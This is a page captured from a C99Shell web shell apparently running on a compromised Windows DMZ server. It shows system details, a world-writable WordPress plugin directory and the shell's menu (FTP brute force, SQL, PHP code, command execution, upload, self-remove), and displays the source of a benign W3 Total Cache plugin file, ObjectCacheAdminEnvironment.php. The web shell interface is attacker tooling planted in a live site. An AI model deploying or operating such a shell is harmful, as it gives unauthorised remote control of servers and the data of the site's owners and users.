!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\cumbreclima\wp-content\plugins\w3-total-cache\lib\W3\   drwxrwxrwx
Free 4.11 GB of 39.52 GB (10.39%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     ObjectCacheAdminEnvironment.php (4.7 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * W3 Object Cache plugin - administrative interface
 */
if (!defined('W3TC')) {
    die();
}

/**
 * Class W3_ObjectCacheAdminEnvironment
 */
class W3_ObjectCacheAdminEnvironment {
    
/*
     * Fixes environment in each wp-admin request
     * @param W3_Config $config
     * @param bool $force_all_checks
     *
     * @throws SelfTestExceptions
     **/
    
public function fix_on_wpadmin_request($config$force_all_checks) {
        
$exs = new SelfTestExceptions();

        try {
            if (
$config->get_boolean('objectcache.enabled'))
                
$this->create_addin();
            elseif (!
$config->get_boolean('fragmentcache.enabled'))
                
$this->delete_addin();
        } catch (
FilesystemOperationException $ex) {
            
$exs->push($ex);
        }

        if (
count($exs->exceptions()) > 0)
            throw 
$exs;
    }

    
/**
     * Fixes environment once event occurs
     * @throws SelfTestExceptions
     **/
    
public function fix_on_event($config$event$old_config null) {
        if (
$config->get_boolean('objectcache.enabled') && 
                
$config->get_string('objectcache.engine') == 'file') {
            if (!
wp_next_scheduled('w3_objectcache_cleanup')) {
                
wp_schedule_event(time(), 
                    
'w3_objectcache_cleanup''w3_objectcache_cleanup');
            }
        } else {
            
$this->unschedule();
        }
    }

    
/**
     * Fixes environment after plugin deactivation
     * @return array
     */
    
public function fix_after_deactivation() {
        
$exs = new SelfTestExceptions();

        try {
            
$this->delete_addin();
        } catch (
FilesystemOperationException $ex) {
            
$exs->push($ex);
        }
    
        
$this->unschedule();

        if (
count($exs->exceptions()) > 0)
            throw 
$exs;
    }

    
/**
     * Returns required rules for module
     * @var W3_Config $config
     * @return array
     */
    
function get_required_rules($config) {
        return 
null;
    }

    
/**
     * scheduling stuff
     **/
    
private function unschedule() {
        if (
wp_next_scheduled('w3_objectcache_cleanup')) {
            
wp_clear_scheduled_hook('w3_objectcache_cleanup');
        }
    }

    
/**
     * Creates add-in
     * @throws FilesystemOperationException
     */
    
private function create_addin() {
        
$src W3TC_INSTALL_FILE_OBJECT_CACHE;
        
$dst W3TC_ADDIN_FILE_OBJECT_CACHE;

        if (
$this->objectcache_installed()) {
            if (
$this->is_objectcache_add_in()) {
                
$script_data = @file_get_contents($dst);
                if (
$script_data == @file_get_contents($src))
                    return;
            } elseif (!
$this->objectcache_check_old_add_in()){
                
w3_require_once(W3TC_INC_FUNCTIONS_DIR '/other.php');
                
w3_require_once(W3TC_INC_FUNCTIONS_DIR '/ui.php');
                if (isset(
$_GET['page']))
                    
$url 'admin.php?page=' $_GET['page'] . '&amp;';
                else
                    
$url basename(w3_remove_query($_SERVER['REQUEST_URI'])) . '?page=w3tc_dashboard&amp;';
                
$remove_url w3_admin_url($url 'w3tc_default_remove_add_in=objectcache');

                throw new 
FilesystemOperationException(
                    
sprintf(__('The Object Cache add-in file object-cache.php is not a W3 Total Cache drop-in.
                    Remove it or disable Object Caching. %s'
'w3-total-cache'),
                    
w3tc_button_link(__('Yes, remove it for me''w3-total-cache'), wp_nonce_url($remove_url,'w3tc'))));
            }
        }

        
w3_wp_copy_file($src$dst);
    }

    
/**
     * Deletes add-in
     * @throws FilesystemOperationException
     */
    
private function delete_addin() {
        if (
$this->is_objectcache_add_in())
            
w3_wp_delete_file(W3TC_ADDIN_FILE_OBJECT_CACHE);
    }

    
/**
     * Returns true if object-cache.php is installed
     *
     * @return boolean
     */
    
public function objectcache_installed() {
        return 
file_exists(W3TC_ADDIN_FILE_OBJECT_CACHE);
    }

    
/**
     * Returns true if object-cache.php is old version.
     *
     * @return boolean
     */
    
public function objectcache_check_old_add_in() {
        return ((
$script_data = @file_get_contents(W3TC_ADDIN_FILE_OBJECT_CACHE))
            && 
strstr($script_data'& w3_instance') !== false
            
|| strstr($script_data"'W3_ObjectCache'") !== false);
    }

    
/**
     * Checks if object-cache.php is latest version
     *
     * @return boolean
     */
    
public function is_objectcache_add_in() {
        return ((
$script_data = @file_get_contents(W3TC_ADDIN_FILE_OBJECT_CACHE))
            && 
strstr($script_data'//ObjectCache Version: 1.3') !== false);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.1716 ]--